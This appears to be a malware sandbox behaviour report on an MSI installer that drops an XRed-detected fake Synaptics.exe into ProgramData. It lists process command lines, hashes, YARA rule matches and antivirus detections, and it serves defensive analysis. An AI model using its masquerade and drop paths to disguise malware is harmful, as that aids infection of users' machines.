                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:1
                                                                                                        Start time:05:49:09
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\xyxmml.msi"
                                                                                                        Imagebase:0x7ff658290000
                                                                                                        File size:69'632 bytes
                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:2
                                                                                                        Start time:05:49:09
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                        Imagebase:0x7ff658290000
                                                                                                        File size:69'632 bytes
                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:3
                                                                                                        Start time:05:49:10
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Installer\MSID754.tmp
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Installer\MSID754.tmp"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'729'536 bytes
                                                                                                        MD5 hash:1D2237FAF8E6198625010CB580280901
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\MSID754.tmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\MSID754.tmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:05:49:11
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                        Imagebase:0x400000
                                                                                                        File size:771'584 bytes
                                                                                                        MD5 hash:7103F3EEC43BBABE34068295157F9F1C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:05:49:12
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                        Imagebase:0x930000
                                                                                                        File size:53'161'064 bytes
                                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:9
                                                                                                        Start time:05:49:22
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:771'584 bytes
                                                                                                        MD5 hash:7103F3EEC43BBABE34068295157F9F1C
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:12
                                                                                                        Start time:05:49:24
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 3728
                                                                                                        Imagebase:0xca0000
                                                                                                        File size:483'680 bytes
                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:17
                                                                                                        Start time:05:51:14
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\splwow64.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\splwow64.exe 12288
                                                                                                        Imagebase:0x7ff6c55b0000
                                                                                                        File size:163'840 bytes
                                                                                                        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Disassembly

                                                                                                        No disassembly